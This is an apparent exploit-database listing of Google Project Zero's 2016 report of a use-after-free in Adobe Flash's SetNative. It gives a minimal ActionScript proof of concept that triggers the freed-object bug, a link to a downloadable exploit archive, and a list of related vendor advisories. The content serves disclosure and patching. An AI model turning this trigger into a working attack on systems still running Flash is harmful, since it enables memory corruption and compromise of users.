Adobe Flash - SetNative Use-After-Free

🗓️ 17 May 2016 00:00:00Reported by Google Security ResearchType

zdt🔗 0day.today👁 41 Views

Adobe Flash - SetNative Use-After-Free vulnerability in SetNative functio

Reporter	Title	Published	Views	Family All 90
FreeBSD	flash -- multiple vulnerabilities	12 May 201600:00	–	freebsd
ALT Linux	Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt62	13 May 201600:00	–	altlinux
ALT Linux	Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt62	13 May 201600:00	–	altlinux
Tenable Nessus	Flash Player < 11.2.202.621 / 18.0.0.352 / 21.0.0.242 Multiple Vulnerabilities (APSB16-15)	15 Jun 201600:00	–	nessus
Tenable Nessus	Adobe AIR <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)	16 May 201600:00	–	nessus
Tenable Nessus	Adobe Flash Player <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)	16 May 201600:00	–	nessus
Tenable Nessus	FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)	20 Jun 201600:00	–	nessus
Tenable Nessus	Adobe AIR for Mac <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)	16 May 201600:00	–	nessus
Tenable Nessus	Adobe Flash Player for Mac <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)	16 May 201600:00	–	nessus
Tenable Nessus	RHEL 5 / 6 : flash-plugin (RHSA-2016:1079)	16 May 201600:00	–	nessus

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=800
 
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:
 
var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);
ASSetNative(t, 106, "a,b");
             
             
function func (){
     
    t.removeMovieClip();
     
    }
 
A swf and fla are attached.
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39831.zip

#  0day.today [2018-04-02]  #

17 May 2016 00:00Current

EPSS0.57611